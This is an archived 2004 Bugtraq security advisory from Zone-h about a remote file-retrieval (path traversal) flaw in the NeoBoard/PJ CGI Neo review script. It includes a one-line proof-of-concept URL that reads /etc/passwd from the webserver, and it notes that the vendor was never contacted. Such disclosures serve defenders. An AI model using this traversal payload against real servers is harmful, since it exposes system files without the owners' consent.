[33294] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

ZH2004-02SA (security advisory): PJ CGI Neo review (NeoBoard

daemon@ATHENA.MIT.EDU (ZetaLabs)
Thu Jan 29 13:52:53 2004

Date: 29 Jan 2004 10:40:43 -0000
Message-ID: <20040129104043.9815.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: ZetaLabs <zetalabs@zone-h.org>
To: bugtraq@securityfocus.com

ZH2004-02SA (security advisory): PJ CGI Neo review (NeoBoard review) Remote arbitrary file retrieving

Published: 29 january 2004

Released: 29 january 2004

Name: PJ CGI Neo review (NeoBoard review)

Affected Systems: Current version

Issue: Remote file retrieving

Author: Zone-h Security Labs

Vendor: http://www.livepj.com

Description

***********

Zone-h Security Team has discovered a flaw in PJ CGI Neo review (NeoBoard review). There is a vulnerability in the current version of NeoBoard that allows an attacker to retrieve arbitrary files from the webserver with its priviledges.

Details

******* 

It's possibile for a remote attacker to retrieve any file from a webserver. 

For example try this:

http://address/directory/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../../etc/passwd

Solution:

*********

The vendor has not been contacted because his site is unreachable.

http://www.zone-h.org/advisories/read/id=3824


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[33294] in bugtraq

ZH2004-02SA (security advisory): PJ CGI Neo review (NeoBoard

daemon@ATHENA.MIT.EDU (ZetaLabs)Thu Jan 29 13:52:53 2004

daemon@ATHENA.MIT.EDU (ZetaLabs)
Thu Jan 29 13:52:53 2004